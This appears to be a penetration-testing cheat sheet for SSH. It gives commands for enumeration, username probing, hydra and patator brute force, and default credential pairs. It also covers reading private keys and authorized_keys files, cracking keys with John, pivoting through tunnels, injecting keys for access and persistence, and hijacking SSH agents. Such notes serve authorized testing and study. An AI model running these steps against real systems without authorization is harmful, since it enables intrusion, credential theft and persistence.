Secure Shell Protocol
Environment Variables / Setup
export IP=
export PORT=22
Phase 1: Service Enumeration
Nmap SSH Scripts
nmap --script=ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -p$PORT $IP
SSH Version and Banner Grabbing
ssh -V
telnet $IP $PORT
nc -nv $IP $PORT
SSH-Audit (Security Assessment)
ssh-audit $IP -p $PORT
Phase 2: Authentication Testing
Username Enumeration
Some SSH implementations leak valid usernames:
# Test common usernames
for user in root admin administrator user test guest; do
echo "Testing: $user"
ssh -o PreferredAuthentications=none -o PubkeyAuthentication=no $user@$IP 2>&1 | grep -E "(Permission denied|Authentication failed)"
done
Brute Force (If Other Vectors Fail)
Use sparingly and only when no other options:
# With hydra (small wordlist only)
hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -t 4 ssh://$IP
# With patator
patator ssh_login host=$IP user=FILE0 password=FILE1 0=/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt 1=/usr/share/wordlists/rockyou.txt -x ignore:mesg='Authentication failed.'
Default Credentials Testing
# Common SSH default credentials:
root:root
admin:admin
user:user
pi:raspberry (Raspberry Pi)
ubuntu:ubuntu
Phase 3: Key-Based Authentication
SSH Key Discovery
Look for SSH keys in web directories, file shares, or other services:
# Common SSH key locations to check:
/.ssh/id_rsa
/.ssh/id_dsa
/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/root/.ssh/id_rsa
SSH Key Permissions Check
If you find SSH keys:
chmod 600 id_rsa
ssh -i id_rsa user@$IP
SSH Key Cracking
If encrypted SSH key found:
# Convert to John format
ssh2john id_rsa > id_rsa.hash
# Crack with John
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Phase 4: SSH Tunneling & Port Forwarding
Local Port Forwarding
Forward local port to target internal service:
ssh -L local_port:target_ip:target_port user@$IP
Dynamic Port Forwarding (SOCKS Proxy)
ssh -D 9050 user@$IP
# Configure proxychains to use 127.0.0.1:9050
Remote Port Forwarding
ssh -R remote_port:local_ip:local_port user@$IP
Phase 5: SSH Configuration Analysis
Check SSH Configuration
If you gain access, check SSH config for weaknesses:
cat /etc/ssh/sshd_config
Look for:
- PermitRootLogin yes
- PasswordAuthentication yes
- PermitEmptyPasswords yes
- X11Forwarding yes
SSH Authorized Keys
cat ~/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
Common SSH Attack Vectors
SSH Key Injection
If you can write to authorized_keys:
echo "your_public_key" >> ~/.ssh/authorized_keys
SSH Escape Sequences
If in restricted shell:
~C
ssh> -L 8080:localhost:80
SSH Agent Hijacking
If SSH agent forwarding is enabled:
SSH_AUTH_SOCK=/tmp/ssh-agent-$USER/agent.$PID ssh user@target
SSH Vulnerabilities to Check
Known SSH CVEs
- CVE-2018-15473 - Username enumeration
- CVE-2020-15778 - Forced command injection
- CVE-2021-41617 - Privilege escalation
Weak Algorithms
Look for deprecated/weak:
- 3DES encryption
- MD5 HMAC
- SHA-1 HMAC
Next Steps
Once SSH access is obtained:
- Enumerate system information
- Check for privilege escalation vectors
- Look for credentials in user files
- Setup persistence if needed